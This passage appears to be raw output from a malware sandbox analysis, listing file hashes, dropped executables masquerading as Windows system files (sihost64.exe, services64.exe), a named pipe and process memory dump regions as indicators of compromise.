
MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

C:\Windows\System32\Microsoft\Libs\sihost64.exe

MD5 943c340e0da33f95572f0beb0fdf875b
SHA1 d1081ddc04e6d52a737386d85a9193b2326ccf7c
SHA256 118a4f9a80ceef768290e81f123246d4adb50785591ff2de9f7cfecd459b5dc9
SHA512 51b8a3c5aaa54d0b4d0f544be2b2b05b1fef82427db0c614df35de8b654331c0150d72ab146f0b6d2e51356620df4ad70afad616fc1edd5d13c5410e25a06cd5

memory/1828-115-0x000007FEEC720000-0x000007FEED27D000-memory.dmp

memory/1828-117-0x000000001B700000-0x000000001B9FF000-memory.dmp

memory/1828-118-0x000007FEEEB90000-0x000007FEEF52D000-memory.dmp

memory/1828-119-0x00000000023A0000-0x00000000023A2000-memory.dmp

memory/1828-120-0x000007FEEEB90000-0x000007FEEF52D000-memory.dmp

memory/1828-121-0x00000000023A2000-0x00000000023A4000-memory.dmp

memory/1828-122-0x00000000023A4000-0x00000000023A7000-memory.dmp

memory/1828-123-0x00000000023AB000-0x00000000023CA000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 42dc9eba47410301406c4e54ad8a114c
SHA1 ec2a755c3901e60fa183cfdb05d409431972d73a
SHA256 96821d8abac10c96ed171bc7158ff9b35a602b53f0da91dd13f0e7b2b7a85ad6
SHA512 a1e21aa88cbec4227b691e4c2bbc33b5e523bb2b210830e1469cde8aca0969b38981f138ada7f48115637d6392fc8c822dd997d9b72d7b45d7f79077900ac36e

memory/1704-127-0x000007FEEB170000-0x000007FEEBCCD000-memory.dmp

memory/1704-128-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/1704-132-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp

memory/1704-131-0x0000000001FF2000-0x0000000001FF4000-memory.dmp

memory/1704-130-0x0000000001FFB000-0x000000000201A000-memory.dmp

memory/1704-133-0x0000000001FF4000-0x0000000001FF7000-memory.dmp

memory/1704-129-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp

memory/1640-134-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-136-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-138-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-140-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-142-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-144-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-146-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-148-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-150-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-152-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-154-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-156-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-158-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1640-160-0x0000000140000000-0x0000000140786000-memory.dmp

memory/552-161-0x0000000000310000-0x0000000000316000-memory.dmp

C:\Windows\system32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

memory/552-163-0x0000000000060000-0x0000000000066000-memory.dmp

memory/552-164-0x000007FEF4E40000-0x000007FEF582C000-memory.dmp

memory/552-165-0x000000001AC22000-0x000000001AC24000-memory.dmp

memory/552-166-0x000000001AC24000-0x000000001AC26000-memory.dmp

memory/552-167-0x000000001AC26000-0x000000001AC27000-memory.dmp

memory/552-168-0x000000001AC27000-0x000000001AC28000-memory.dmp